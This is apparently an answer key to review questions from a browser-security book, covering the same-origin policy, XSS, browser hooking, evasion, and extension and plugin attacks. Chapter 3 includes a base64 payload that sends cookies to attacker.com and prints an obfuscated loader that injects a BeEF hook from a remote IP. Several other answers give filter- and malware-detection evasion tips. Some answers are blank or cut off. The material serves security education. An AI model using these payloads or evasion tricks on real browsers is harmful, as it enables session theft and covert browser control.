BHH logo


Chapter 1

1. What function does the DOM have within the web browser?

The DOM or Document Object Model is an API providing access to the structure of a document rendered in the browser. It is most commonly used to manipulate (read, modify or create) elements of HTML documents using JavaScript, however it is a language-independent abstraction and is exclusive neither to HTML nor JavaScript.

2. Why is having a secure browser important to a holistic security approach?

There is a co-dependency between the web browser and web server if security is to be maintained. Although a secure website may limit the propagation of any breach to the context of the access rights it has granted any given session, if the browser is compromised the security of the website is also compromised for the individual using that browser. By extension, if the functional privileges granted to the session associated to the compromised browser are ever extended to an administrative capacity, even a secure site can be compromised by an insecure browser. By further extension, a secure browser may be compromised by another insecure website in another tab due to the implicit trust relationship. It is easy to see how the browser can become the junction and potentially the weakest link between the security domains of unrelated websites.

3. What is the Same Origin Policy? Why does an attacker want to bypass it?

The Same Origin Policy, or SOP, is a security control implemented inconsistently by browsers and plugins aimed at preventing different origins fully interacting with each other. Most importantly, it prevents access to the Document Object Model (DOM) of other origins. An origin is defined as the unique set of scheme, domain and port. It is designed to prevent resources from disparate websites from interacting with each other via the browser. An attacker who can bypass the SOP can extend their control over the browser and extract data from other origins.

4. Name three ways the server can reduce the security of a web browser.

The web browser must place a level of trust in the web server in order to render the user experience defined by the web server. In order to support the features of modern websites that may bring resources from different origins together in one place, the web browser will respect various directives the web server can issue. Firstly, the server could define a promiscuous Cross-origin Resource sharing (CORS) policy which relaxes the SOP and allows any other site access to the DOM. Secondly the web server could fail to make use of security features in the browser such as the X-Frame-Options header and HttpOnly or Secure cookie flags, leaving pages vulnerable to Clickjacking attacks and cookies accessible from JavaScript or via plaintext channels respectively. Lastly the server could use Content Security Policy (CSP) headers allowing remote origins to be used to embed scripts, or allowing directives such as unsafe-eval.

5. What is the web browser’s attack surface?

The attack surface is any functionality in the browser involved in the processing of external and therefore untrusted input. This includes any aspects of its functionality that may ever be influenced by external data, including data stored and processed subsequently and in a manner potentially separated from the data’s initial incidence.

6. Describe sandboxing.

Sandboxing is a security feature designed to limit the propagation of influence through compartmentalization and therefore strengthen the aggregate security level. It establishes zones of trust and limits the extent of functionality according to the requirements of each zone. In this way, if one zone is compromised, the sandbox acts to prevent the compromised zone from gaining influence over other areas of the program (the browser in this case). For instance, if you find a Use After Free (UAF) vulnerability while fuzzing parts of the Webkit renderer functionality, you would still need to bypass the sandbox to execute operating system commands with the privileges of the browser.

7. When a browser is using HTTPS to communicate, can a proxy view the communication?

The ability of a proxy, or man-in-the-middle, to intercept HTTPS communication depends upon the termination point of the connection. The browser contains a store of trusted Certificate Authorities that it will use to verify the digital signature of any site it connects to over HTTPS. If the certificate is not valid in any way e.g. if there is a hostname mismatch, or it is not signed by an authority in the trusted store or has expired, the browser will issue a warning that the connection may not be secure. If the user accepts the warning, the connection will be established using the public key supplied. Since a proxy may have intercepted this aspect of the communication and supplied its own certificate, it is possible for a proxy to act as a man-in-the-middle and serve to terminate the connection without the browser having additional visibility. A proxy that does not terminate the connection will have to pass the data to the remote server directly, and consequently be unable to decipher the encrypted data stream.

8. Name three security related HTTP headers.

The Content-Security-Policy header can be used to restrict the permissible locations and privileges of scripts in the rendered page, and can therefore help defeat Cross-site Scripting attacks. The Strict-Transport-Security header can be set to prevent the user accepting content originating over plaintext channels. The X-Frame-Options header will instruct the browser not to load the page within an IFrame.

9. Why is the Robustness Principle not a security professional’s friend?

The Robustness Principle, or Postel’s Law implies that programmers should be liberal in what they accept from external sources whilst maintaining conformity to standards and conservatism in respect of any output. This philosophy favors functionality over security; in other words, it attempts to compensate for any errors or omissions on the part of third parties in order to reduce refusals and resultant loss of function. This is exactly the opposite philosophy necessary to achieve strong security, because an excessively permissive and tolerant program will be less likely to maintain security constraints by presupposing exploitation attempts are simply oversights. As a result, it will attempt to serve rather than refuse malformed requests, with an escalated probability that security constraints will not be maintained.

10. Which scripting language is available in Internet Explorer and not the other modern browsers?

Internet Explorer uniquely implements VBScript, a scripting language initially designed to assist in the creation and rendering of webpages. It is similar in many respects to JavaScript. Both scripting languages were launched with Internet Explorer 3, released in August 1996, although JavaScript was termed JScript by Microsoft.

Chapter 2

1. What are some actions an attacker may perform if they executed their code within a web browser?

The actions available to an attacker depend upon the execution context of the injected code. Typically however, an attacker will leverage JavaScript execution, initially within the context of one compromised origin. The list of possible actions is of course arbitrary; common attacks might compromise session or other cookies associated with the domain, alter the page’s content and appearance, launch browser or plugin exploits, and submit requests to arbitrary origins and read responses from the server for the compromised origin.

2. Describe the main differences with the types of XSS attacks.

The three primary XSS variants are DOM XSS, Reflected XSS and Stored XSS.

3. Describe a browser control that may prevent an XSS from executing.

The XSS filter implementations in various browsers, for example XSS Auditor (Chrome and Safari) and XSS filter (Internet Explorer) act to attempt to detect and prevent XSS attacks. The methods by which they achieve this are inconclusive; they typically involve detecting attempts to inject HTML or JavaScript code or by trapping functions commonly used in such attacks, but this “blacklist” approach has resulted in several bypasses. Other extensions such as “NoScript” for Firefox may be more effective by being more callous in their approach, for example by whitelisting from which origins JavaScript can be trusted for execution. Functionality is sacrificed for additional security in that case.

4. Name one of the more notable XSS viruses, and how it propagated.

The Samy Worm is perhaps the most famous XSS virus. It involved a stored XSS vulnerability on the MySpace website, used to initially upload a JavaScript XSS payload to a single profile. Anybody viewing the profile would add the user (Samy) to their “friends” list and also would have their profile page infected with the same code. This resulted in an exponential propagation of the code and the Samy user being the recipient of over a million friend request in less than 20 hours.

5. Describe a method in which an attacker may compromise a website, and modify it to publish their malicious code.

Other than the discovery and exploitation of a stored XSS vulnerability, there are potentially innumerable other methods that an attacker may leverage to gain control over a web application, for example:

6. Under what circumstances can you use sslstrip?

sslstrip can be used to modify the links within HTML pages and within redirects that refer to locations utilizing the https: scheme. As it does this on-the-fly as they traverse the network, it should be used when the attacker is in a position to observe and modify network traffic, such as during an ARP spoofing attack.

7. Describe ARP spoofing.

Address Resolution Protocol (ARP) spoofing or poisoning is a technique that leverages the inherent insecurity within the ARP protocol to subvert the normal flow of traffic within a local network. Under normal circumstances ARP is used to facilitate hosts talking to each other by providing a method to associate an IP address to the Media Access Control (MAC) address of a network adapter. ARP spoofing can be accomplished using a variety of different ARP protocol messages, but the essential technique is always the same. The attacker passes a message that informs a system a particular IP address should be associated with a particular (MAC) address, replacing any previous association. For instance, the attacker could send spoofed ARP packets to a host in the same Local Area Network (LAN), advising the host that the gateway address should be resolved to their MAC address. In this way, any traffic from the targeted host that was originally supposed to traverse the gateway (so potentially the Internet) can be now observed and potentially modified by the attacker.

8. What are the differences between phishing and SPAM?

SPAM is a term to describe any unsolicited email, often sent in bulk, advertising real (or potentially fake) goods and services. SPAM may also make no attempt to masquerade its illegitimacy to coerce the user into divulging. Phishing is the use of email in a deliberate attempt to engender action on the part of the recipient that could lead to them disclosing sensitive information or unwittingly giving something else away.

9. Describe in a few simple steps how you would perform a Social Engineering attack.

The answer provided here follows a classic recipe for a remote Social Engineering engagement utilizing a website and phishing.

10. Describe a physical ‘baiting’ technique.

Physical ‘baiting’ involves placing or giving away actual items which if deployed may compromise security. Examples include the distribution of USB sticks containing malicious payloads or leveraging a Quick Response (QR) code to direct the scanning appliance to arbitrary URLs containing malicious code. In each case the initialization vector is the user applying the physical object to establish contact with arbitrary resources.

Chapter 3

1. What are the advantages in using a WebSocket channel instead of an XmlHttpRequest channel?

The most important advantage is the streaming nature of the WebSocket channel, which eliminates the necessity to continuously poll the server to simulate full bi-directional communication. The second advantage, which partially arises due to the first advantage, is increased speed. The speed difference is amplified by WebSockets’ native support for multiple datasets such as Blob or ArrayBuffer, allowing for direct binary communication.

2. Describe how a DNS-based channel works, and why it’s good to have a stealthy communication.

Because the HTTP protocol defines that resources within a page may contain FQDNs (Fully Qualified Domain Names), there is native support for the DNS system within browsers. An attacker can leverage this facility to exfiltrate data by making multiple queries to subdomains of a domain under their control, encoding the data to be sent and ensuring the total query length is fewer than 255 characters. Bidirectional communication can be achieved but is more complex; in the chapter we describe using a timing method and later demonstrate using a faster method that reconstructs the server’s message using successful and unsuccessful connections to the domains that signify each bit of data.

3. What is hooking a browser?

After the attacker is able to initiate control with a browser, it’s important to retain that control. Hooking is controlling the browser sufficiently such that a bidirectional communication channel to an attacker-controlled server is achieved. The result of a successful hooking is that the attacker can control the hooked origin for some duration and degree.

4. Why can Man-in-the-Browser be effective in situations when IFrames cannot be used?

The use of IFrames can be easily prevented by the webserver through the use of X-Frame-Options headers directive, but the MitB attack is harder to prevent since it assimilates features that have no simple security switch. Although more complex to initiate, the MitB attack can perform extensive remodeling of the present page, arbitrarily altering both its structure and intercepting any actions taken by the user in order to prevent the loss of the injected and executing payload through page reloading. Advanced MitB features also include overriding the prototypes of multiple JavaScript objects, such as XmlHttpRequest and others.

5. How does the WhiteSpace encoding evasion technique work?

WhiteSpace encoding is a binary-encoding scheme that remaps ASCII characters into whitespace equivalents. By representing the “1” state as a Space character, and the “0” character as a Tab character, any data can be transmitted using only whitespaces. Obviously some bootstrapping code is needed in order to decode the data and execute it.

6. Imagine an environment where you have a network protected by a web filtering solution. Which evasions techniques would you use? How would you combine them?

There is no definitive set answer to this question, however it is virtually certain you would require a method to evade the blacklist of characters or sequences of characters that may trigger any given web request to be blocked by the web filtering solution. To maximize the probability of success, a combination of different techniques could be used to enhance the obscurity of the request and reduce the probability that any banned keywords will be detected. An example would be first splitting the JavaScript into sections by combining strings into concatenations of others strings, and then Base64 Encoding the payload. Then eliminate common blocked function names such as eval() by replacing them with lesser known ones, such as setInterval() or setTimeout(). An example of the following we provide in the book is setTimeout(atob("bG9jYXRpb24uaHJlZj0naHR0cDovL2F0dGFja2VyLmNvbT9jPScrZG9jdW1lbnQuY29va2ll"));

7. Why would a time delay evasion technique be effective against Malware detection technologies?

Due to the complexities associated with the innumerable permutations achievable via code obfuscation techniques, anti-Malware technologies deploy JavaScript runtime engines to assist in their analysis of what the code is doing. To speed up analysis time, functions that cause delays such as setTimeout() or setInterval() are either ignored, or the delay not fully emulated, therefore code can potentially be placed in these functions without triggering alerts.

8. Give an example of hijacking a DOM event.

There are many DOM events that can be hijacked using prototype overriding. Due to the variance in possibilities there are many potentially valid answers here – if you provided code as we did in the chapter we invite you to test it to see if it works! Otherwise you could have listed many possible methods, such as onclick, onmouseover, onmouseout, onload. Another example is overriding the prototype of XmlHttpRequest.send() in order to send a copy of the request details to the attacker server.

9. What is the most reliable persistence technique in your opinion? Would you combine some of the techniques discussed previously?

The most reliable persistence techniques in the Author’s opinion tend to be those for which there are already well established defenses, and for which security tests are already in place, for example in web security scanner products. As is typical, there will be a distribution of web servers (or web browsers) implementing security features, and the frequency of “inoculations” may appear somewhat like a parabola – initially few sites adopt the standard, followed by the majority, until finally most sites are secure and only a few remain without the features. The Pop-Under, which is slightly different from a traditional pop-up, is therefore arguably the most robust method as it provides a means to open an entirely new page that may go undetected the longest (even after the user closes the initial page). However it is also the most defended against, as most browsers will prevent pop-ups by default. The IFrame technique is our present second choice as it immediately provides a full persistence buffer. This is followed by more sophisticated methods such as Man-in-the-Browser attacks. For reliability in terms of maximizing the chances of successful deployment in arbitrary circumstances, choose a combination of cutting edge techniques such as a white-space encoded obfuscated payload utilizing time delays and event overriding to achieve a blended MitB attack.

10. What does the following encoded string do? You can download the code from

Obfuscated code:


This was an intentionally “challenging” question. We have provided the breakdown below:
After base64 decoding the blob, you get the following:

                    eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('f 3(a){i=\'\\v\'==\'v\';8(!i){2.h(\'6\')[0].7(a)}};s=2[\'9\'+\'b\'+\'c\'[\'d\'](/e/,\'5\')](\'g\');4="j.k/l"+":1.m.n.o"+"//:p";4.q("").r().t("");s.u=w(x("y=="));3(s);',35,35,'||document|xiruMDJ|ndhys|Elem|head|appendChild|if|cr||eate|423423sdfweentent|replace|423423sdfweent|function|script|getElementsByTagName||sj|kooh|0003|76|61|271|ptth|split|reverse||join|src||eval|atob|InNqLmtvb2gvMDAwMzoxLjc2LjYxLjI3MS8vOnB0dGgiLnNwbGl0KCIiKVsncmV2JysnYWFhYWEnWydyZXBsYWNlJ10oL2FhYWFhLywnZXJzZScpXSgpWydqb2luJ10oIiIpOw'.split('|'),0,{}))

It looks packed with JSmin or similar tools. Beautifying the code, you get the following:

function xiruMDJ(a) {
    i = '\v' == 'v';
    if (!i) {
s = document['cr' + 'eate' + '423423sdfweentent' ['replace'](/423423sdfweent/, 'Elem')]('script');
ndhys = "sj.kooh/0003" + ":" + "//:ptth";
s.src = eval(atob("InNqLmtvb2gvMDAwMzoxLjc2LjYxLjI3MS8vOnB0dGgiLnNwbGl0KCIiKVsncmV2JysnYWFhYWEnWydyZXBsYWNlJ10oL2FhYWFhLywnZXJzZScpXSgpWydqb2luJ10oIiIpOw=="));


The script element 's' is created using

As you can see it uses bracket notation, instead of dot notation. The 'createElement' function is obfuscated with a simple string replace.

Then the 'ndhys' string is created, with the value of The string was simply written in the reverse way.

Now, eval is called on the decoded value of the following base64 encoded string:

Which after decoding is:

This uses the same trick discussed before, reversing the string and doing string replace on the 'reverse' function, using bracket notation once again. This string is used as the source of the 's' script, while the 'ndhys' string created before is not used, so it's basically redundant code.

Now we have the script, but it's not added into the DOM yet…To accomplish that, the 'xiruMDJ' function is called. This function adds the script in the 'head' of the current document only if 'i' has a boolean value equal to false.

This happens in all major browsers, with the exception of Internet Explorer. IE's Trident JavaScript engine is in fact the only mainstream engine where the 'v' character is considered equal to the '\v' vertical tab character (so '\v'=='v' returns true).

The answer therefore, is that through using a JavaScript engine quirk, we are targeting every browser that isn’t IE, hooking those browsers with BeEF.

Chapter 4

1. What is the Same Origin Policy and why it is so important when dealing with browser security?

The Same Origin Policy, or SOP, is a security control implemented inconsistently by browsers and plugins aimed at preventing different origins fully interacting with each other. Most importantly, it prevents access to the Document Object Model (DOM) of other origins. An origin is defined as the unique set of scheme, domain and port. It is designed to prevent resources from disparate websites from interacting with each other via the browser. An attacker who can bypass the SOP can extend their control over the browser and extract data from other origins.

2. Why would achieving an SOP bypass be very interesting from the attacker’s point of view?

If the SOP can be bypassed, the primary restriction on interaction with other attack surfaces within or within reach of the browser is lifted. An attacker is at liberty to transmit requests and receive responses from arbitrary hosts and access the DOM of other origins loaded within the browser. This greatly increases the attack possibilities and degree of control the attacker has over the browser.

3. Explain how you can use the hooked browser as an HTTP proxy. What is the difference between using it with an SOP bypass and without?

Due to the power of JavaScript and AJAX, it is possible to programmatically control the browser to generate requests and receive responses without user interaction. By manufacturing the appropriate functions, a tunneling proxy can be created by also including facilities to listen to external requests. The BeEF tool implements both aspects in its Tunneling Proxy. When a SOP bypass has not been established, the SOP will restrict the scope of the proxy to the origin under which it is executing. It is therefore beneficial to bypass the SOP and lift this restriction and proxy to arbitrary origins.

4. Describe one of the Java SOP bypasses.

There are a variety of possible answers – we have provided one for each example in given in the book. An inherent flaw in the implementation of Java allows the SOP to be “extended” (as it is not functioning in a way contrary to its design) and, from the point of view of other SOP policies, bypassed. Neal Poole identified a flaw that allowed the SOP to be bypassed because the origin is defined as the source of an HTTP 301 or 302 redirect, rather than the origin where the applet was obtained (the destination of the redirect in this case). Fredrick Braun’s SOP bypass affected a bypass for jar files (and odt, docx and other zip format file types), which could by default be loaded from any origin using the jar scheme when creating a new instance of the URL object.

5. Explain how the Safari SOP bypass works.

The Safari browser, from 2007 until at least version 6.0.2, does not enforce the SOP when a local resource is accessed via the file: protocol. Therefore if an attacker is able to trick a user into opening a file using the file: scheme, the SOP could be bypassed using for example XmlHttpRequest in order to perform two-way communications with other origins.

6. Explain how the latest Adobe Reader SOP bypass is related to XML External Entity vulnerabilities.

The bypass described by CVE-2013-0622 uses XML External Entities – the ability to embed documents from other locations into the XML structure – to affect the bypass because in a similar manner to Java, the redirection target from a resource referred from an external entity is considered the origin as opposed to the resource itself. By just embedding an external resource into an XML document, resources can be retrieved from other origins (as long as an HTTP 302 redirect is involved, which is very easy to accomplish as the attacker has full control over the application that does the redirection).

7. Describe an example of Clickjacking.

Clickjacking is a UI redressing attack that involves separating the presentation and functional layers of the browser’s user interface. This is accomplished using IFrames, usually by overlaying an invisible element into the space of another, such that the true function is masqueraded and the user can be tricked into activating it. This is necessary as the browser security model is implemented by constraining certain actions to user-initiated events. Your specific answer could take many forms, an arbitrary example would be overlaying a “Logout” button with a function that did something else, for example create a new user or change the password to a value known to the attacker. Back in the days Clickjacking was also used to trick users into allowing a specific origin to access microphone and camera via Flash.

8. Describe an example of Filejacking.

Filejacking is an attack the leverages the browser’s direct local access to the host machine’s file system and can allow an attacker to extract locally accessible files to a remote location. It functions through a UI redressing attack but requires browsers supporting the directory and webkitdirectory features (Chrome only at the time of writing) and relies on fooling the user into thinking they are downloading a file, when in reality they are uploading one. The attacker will be able to access and retrieve any files in the folder the user selects. An example would be creating a fake “Download To” input button which overlays an input tab invoking the webkitdirectory features. It is likely to be most effective when combined with another attack such as phishing.

9. How have browser history hacks historically evolved? Describe one of the latest attacks based on cache timing.

The browser’s history security history (pun intended) is in many ways analogous to computer security’s history in general. Initially, the functions were friendly and permissive and therefore widely accessible. As people became aware of the potential avenues of abuse of these features, additional security measures were implemented. The classical attacks involving the use of CSS took advantage of the pervasiveness of the features. By utilizing the possibility of embedding URLs into CSS styles, conditions could be tested and the results silently sent upstream. Later techniques involved the flexibility in the DOM that allows JavaScript to enquire about the status of various visual document elements, and transmit these results to a remote location. The Cache timing attack involves comparing the time taken to load a resource locally if it is already cached against the longer time necessary to remotely retrieve it. The security restrictions of IFrames and the SOP actually benefit this attack, because otherwise the act of testing whether an item is cached can modify (and cOrrùpt) the cache.

10. Why is analyzing the Browser API important? Describe one of the attacks on the Avant or Maxton browsers.

Each browser variant may implement its own specific features, especially as doing so may assist in its differentiation against competitor browsers. Analysis of the browser API becomes important as relying on the documentation is not a forensic approach and cannot expose hidden or undocumented functionality. The Avant attack demonstrates this through use of the undocumented AFRunCommand() JavaScript call and the passing of unusual values (notably 60003), whereby the SOP is bypassed and the entire browser history retrieved.

Chapter 5

1. Describe a JavaScript method that could be used to rewrite HTML content within a rendered page.

There are multiple possible methods here – too many to list, but perhaps the easiest is the use of the innerHTML property which exists for every HTML element in the DOM. It provides access directly to the HTML of the element and modifying it will immediately cause the change to be reflected in the page. You could also use jQuery to simplify this process.

2. What JavaScript event would need to be overridden to capture mouse click?

As the name suggests, the “click” event can be registered to an event listener (for instance using addEventListener()) within the DOM in order to call an arbitrary function whenever a mouse click is performed on the element.

3. Describe a practical example on how you could abuse UI expectations on Internet Explorer.

The use of modeless notifications is the answer we were looking for. By spawning a pop-under window that downloads an executable, prompts invisibly with modeless notifications and obtains focus, you can modify the foreground window to coerce the user into pressing the R, SPACE or ENTER keys. The keypress will be directed to the pop-under, and corresponds to clicking on Run in the modeless dialog (yes, that dialog has keyboard shortcuts!). This action will spawn the executable through obtaining user consent.

4. What information is required before attempting to launch a fullscreen attack?

If the fullscreen attack being performed is through the use of Foreground IFrames, then it is important to ensure that the content being loaded can in fact be loaded in a frame. If the content being displayed has restrictive X-Frame-Options, then it may not be possible to perform these sorts of attacks.

5. Why are software update prompts a good feature to impersonate?

Software update prompts may promote a user into a false sense of security; by their very nature they are appealing to the security conscious aspects of the psyche and therefore may circumvent suspicion. Also, with modern software, users have a tendency to be accustomed to an increasing frequency of such update prompts from multiple sources, because it is typical that each update process is unilateral.

6. What browsers can you execute TabNabbing attacks against?

The TabNabbing attack, as the name implies, is effective against browsers with tabs (which is most, if not all, modern browsers). The concept is simple: wait until a period of time of inactivity in the tab you control has elapsed, and with the assumption that the inactivity either means the user is not looking at the page or is actively using another tab, modify the content to another site under your control by issuing a redirection. In this way, a social engineering attack may be more simple as the user may assume they visited the site themselves without checking the URL or other aspects.

7. Describe the benefits and limitations of running a Java Applet. Is it better to run a signed or unsigned one?

If a Java Applet is used, the attack surface available increases because the Java applet enjoys privileges not available to the browser. In particular, a signed Java applet can execute operating system commands and forge reverse connections with which to transfer data. A signed Java applet is much superior to an unsigned one, as without a valid code certificate the user will need to accept the dialog box in order for the applet to run. This may necessitate another layer of sophistication to achieve, such as a UI redressing attack. As of Firefox version 26, Click to Play dialogs will now be presented for all plugins, regardless of signatures, except for the latest version of Flash. Finally, from Java 1.7 update 51 Oracle decided to disallow execution of unsigned applets and self-signed ones, allowing only applets signed with valid certificates (which aren’t too difficult to buy for a serious attacker). It is due to these controls present in modern browsers that the usefulness of applets as an attack vector is slowly declining.

8. What resources can be requested to determine if the browser is using Tor?

The Tor network offers a variety of hidden resources, with the pseudo top-level domain .onion. Therefore it is easy to verify if Tor is enabled by requesting access to known resources available only from inside the Tor network (such as http://xycpusearchon2mc.onion/deeplogo.jpg). Success indicates that the browser is connected to Tor, whilst failure implies it is not.

9. What conditions must exist to record audio via a browser?

Like many other privileged functions, there is a user interface permission restraint coded into modern browsers. Therefore a social engineering, UI redressing (see Clickjacking the Flash Settings manager and Camjacking attacks) or similar attack is necessary in order to fool the user into accepting the microphone being enabled.

10. What is a Camjacking attack?

The Camjacking attack is a variant of a Clickjacking attack implemented within Flash. It was possible to overlay an invisible Flash object within another Flash object, so as to disguise the true warning and present an alternative display. In this way, the user can be coerced into clicking on the page to accept the use of the camera without being aware they have done so.

Chapter 6

1. Why is using DOM properties for fingerprinting more reliable than using the User-Agent header?

The User-Agent header is a singular piece of information, an arbitrary text string, and could therefore be trivially modified in transit – e.g. via an upstream proxy server. Using the DOM properties is a more robust method as the enquiries are being made directly in the browser and therefore are slightly more difficult to falsify and further involve more complexity. This allows more reliable and refined fingerprinting than reading a generalized version label. The best fingerprinting result comes from combining User-Agent, DOM properties and browser bugs or quirks.

2. What is the result of a double negation on a DOM property that exists? For example, !!window?

If a property exists, the double negation will return true (true becomes false becomes true). Using the double negation is also an elegant and convenient way to implicitly cast the result to Boolean.

3. What is the result of a double negation on a null? For example, !!null?

The result will be false (negating a null becomes true, then negating again becomes false).

4. How effective is JavaScript Encryption?

JavaScript Encryption can certainly generate headaches for the would-be reverse engineer, but this is just a time sled and ultimately it is completely ineffective at obfuscating the nature of the code. It is a form of security through obscurity; although arguably it can be sufficiently obscure to dissuade all but the most determined attackers, with time reconstruction of the code is inevitably possible as it reveals itself through its execution and subsequent interaction with other software components. In the end, the browser has to have access to all the code performing the encryption, and therefore attackers will also be able to access, and tamper with, all the required logic.

5. Why might you want to fingerprint the browser language?

Different browser versions introduce different properties into their implementation of the JavaScript language. By doing a few simple checks for the existence of properties or functions known to be introduced in particular revisions, it is possible to gain a reasonably accurate determination of the browser’s exact version. More checks can refine this further.

6. How do web browser quirks aid in fingerprinting?

Web browser quirks can provide a very quick method to determine the flavor of browser running, and sometimes even its specific version. They tend to be accurate due to their obscurity or uniqueness, and most of the time allow a simple Boolean test for their existence (or lack of) to reveal by inference details concerning the nature of the runtime environment. They are also much more difficult to fake than User-Agent or DOM properties.

7. What cookie settings help ensure cookies aren’t available to JavaScript and are only sent to the secure version of websites?

The flags “Secure” and “HttpOnly” are the primary security flags for cookies. The former is a directive that instructs the browser only to send the cookie if the channel is encrypted (origin with https scheme), and the latter renders the cookie inaccessible from JavaScript. If both are set, the cookie cannot be compromised by simple network eavesdropping (which do not involve SSL MITM) and also cannot be simply obtained by a script executing in the DOM such as console.log(document.cookie). Still, there are situations where HttpOnly cookies can be abused, for example by performing Session Riding (if the application is vulnerable to XSS).

8. How does the Null Character attack work in SSL certificates?

Because the Null character is used as a string terminator in many compiled programming languages (such as C or C++) any such program processing string-based input may terminate the string when the null is encountered. The Null Character attack leveraged this behavior to bypass the SSL validation protection in browsers. It was possible because certain Certificate Registrars accepted and published SSL certificates with Null characters in them, and browsers were not designed to expect any nulls. They therefore misinterpreted (misread) the string and could be tricked into validating any otherwise valid certificate as being legitimate for any arbitrary domain – even if it was not signed for that domain.

9. What’s the difference between a Metasploit bind_shell and reverse_shell?

The difference lies in the direction of originating connection to the shell. A bind shell - as the name implies - binds (opens) a port on the exploited system. Attackers must therefore connect to the port by creating their own connection to the newly listening service. A reverse shell has the opposite direction: Instead of opening a port it throws a connection attempt to another arbitrary external system. In order to connect, the attacker must bind (open) a port on the pre-determined address in order to catch the reverse connection attempt.

10. How can BeEF and Metasploit communicate?

They communicate using the MSGRPC Metasploit interface. This is a Remote Procedure Call interface in Metasploit that allows other programs to interact with its facilities. This allows all features except interacting with spawned shells to be managed from the BeEF console.

Chapter 7

1. Compare the Chrome and Firefox extension security models.

Firefox has no concept of access levels and allows access to all permissions to all extensions, Chrome on the other hand implements security levels. This separation is also explored further with Chrome’s Isolated World concept, which isolates aspects of scripts from each other by instantiating a private data store for each. Both browsers implement a privileged chrome:// zone where all aspects are accessible. In general it follows the security implications of extensions are approximately equivalent as both extend a significant and pervasive level of access to the browser’s core features by design. One of the main differences is that a malicious Firefox extension can easily lead to OS command execution, while a malicious Chrome extension can’t execute commands directly unless it uses NPAPI.

2. What is an effective way to fingerprint an extension?

There are many possible methods of fingerprinting an extension. You could use quirks in the HTTP Headers that are set (although this method may be subject to external influences depending on the method), some quirks will be exposed via the DOM, others via the Manifest.

3. What is the chrome:// zone and why is it important?

The chrome:// zone is a privileged zone where all features of a given extension are available. This is important from an attacker’s perspective because if the chrome:// zone can be accessed and requests to it manipulated, for example through exploitation of an extension’s feature, then the maximum amount of control over the browser extension’s interface is potentially gained.

4. How does CSP apply to browser extensions?

The Content Security Policy has been applied to browser extensions to apply security restraints upon them. In Chrome it allows a particular extension to be given a set of restrictions that define the resources it is allowed to access. Therefore if the extension is compromised and execution subverted, the functions accessible to the attacker are still restricted by the CSP. It is, conceptually speaking, a sandbox. In Chrome of particular relevance is that the content scripts are not protected by the CSP, making them especially vulnerable to attack because they can access the DOM.

5. How does SOP apply to browser extensions?

Extensions run in two main zones, the low privileged Internet Zone, and the higher privileged browser zone (or chrome:// zone). To provide features, browsers expose APIs to extensions, both at the Browser level, and often the OS level. Extensions often have more privileges than they need. The low privileged, Internet Zone, abides by the SOP, and this is where JavaScript executes. Extensions on the other hand run in the privileged zone, or chrome:// zone. This zone results in extensions having access to more sensitive information, privileged APIs and without restriction from the SOP.

6. How can you execute OS commands in Firefox extensions?

The Cross Platform Component Object Model (XPCOM) API can be used for this purpose. By leveraging the Components.interfaces.nsILocalFile and Components.interfaces.nsIProcess together, it is possible to associate a file on the local filesystem with a process and execute it. This means you can embed a malicious payload in the extension .xpi archive, and programmatically execute it as soon as the extension is installed and running.

7. How can you execute OS commands in Chrome extensions?

The Netscape Plugin Application Programming Interface (NPAPI) is implemented with Chrome and has the privileges to execute operating system commands and is unbounded by the Chrome sandbox. The Chromium team announced that Chrome’s NPAPI support would be phased out over 2014.

8. What privileges does a content script have?

Content scripts have full access to the DOM, but are otherwise constrained by a SOP, they cannot interact with page scripts for example. However, they are not subject to the Content Security Policy (CSP) and have full privileges in respect of the context of the web page the browser has visited. This makes them attractive targets for attack.

9. What privileges does the background page have?

Background pages are constrained by the Content Security Policy (CSP), and so their privileges can vary significantly, depending on those that have been enabled or disabled in the extension’s manifest. However, the background page is considered a restricted zone and therefore it can potentially access all the extension features, including the NPAPI and therefore potentially the operating system. It is important to remember the background pages cannot interact directly with content scripts, and can do so only via message passing.

10. What privileges do Firefox extensions have?

The security model for Firefox extensions is flat – and therefore a Firefox extension will (effectively) have the same privileges as the browser process. This makes Firefox extensions highly attractive targets for attackers.

Chapter 8

1. How are plugins and add-ons different?

Add-ons, or extensions, differ from plugins in that the former extends the functionality of the browser, and typically are used from within other browser-managed areas such as JavaScript. They literally extend the browsers feature set. A plugin however is an external program that interfaces with the browser but does not extend it. Plugins are only used to process discrete and specific types of objects or MIME types, either when encountered within a HTTP header or embedded within the content of a page and do not share a wider interaction with the DOM or the browser.

2. What is an efficient method to detect plugins in Internet Explorer?

By attempting to instantiate an ActiveX object for a particular plugin, it is possible to test whether a valid object is returned and therefore whether or not the plugin is installed and active. To look for more than just a single plugin requires the instantiation of many ActiveX objects. Using this technique is effective for popular, and known plugins, unfortunately it’s not effective if uncommon or custom plugins happen to be present. Additionally, the latest versions of Internet Explorer whitelist common plugins like Flash while accessing other less-popular plugins (including fingerprinting them) will alert the user when used.

3. What is an efficient method to detect plugins in Firefox?

Firefox implements a navigator.plugins object, accessible in the DOM. It can be iterated over to reveal a list of installed plugins. This method is much more efficient than detecting plugins in Internet Explorer, as iterating this object will provide a list of ALL the installed plugins, not just those known of in advance.

4. How does the web browser determine which plugin to use?

The browser matches the MIME type of server responses incorporating the Content-Type HTTP header, or refers to the “type” of objects embedded via the <object> or <embed> HTML tags in order to do a MIME type match in a similar way. In the instance of Java, it’s possible to specify particular Java Runtime Environments within Firefox. This is achieved through specifying version information within the relevant <embed> HTML tags.

5. When is a signed Java applet potentially exploitable?

A signed applet has additional permissions with respect to the sandbox, and can execute code in a less restricted fashion. This makes them potentially more dangerous from a security perspective and therefore potential targets for exploitation attempts. Through reversing the applet’s code, you may be able to uncover unsafe input parameters that may be exploited to your advantage. For instance, if a signed applet has logic that executes OS commands, and the input into this logic can be tainted, then an attacker can leverage this to execute arbitrary OS commands. The fact that this applet is signed does not prevent this issue from occurring.

6. Why would an application override the signed applet permission model?

In order to access additional features, an applet may override the default Security Manager so as to relax permissions and enable access to additional functionality that is otherwise restricted. If you don’t override the permission model then security exceptions will be thrown when the applet attempts to perform activities that require certain permissions, such as executing OS commands.

7. Can unsigned Java applets execute operating system commands?

By default unsigned Java applets execute in a sandbox, and therefore are unable to access operating system commands without a sandbox bypass. There have been cases discussed in the book where it was possible to bypass the Sandbox and execute OS commands from an unsigned applet. As mentioned before though, from Java 1.7 update 51 unsigned applets will not run as-is.
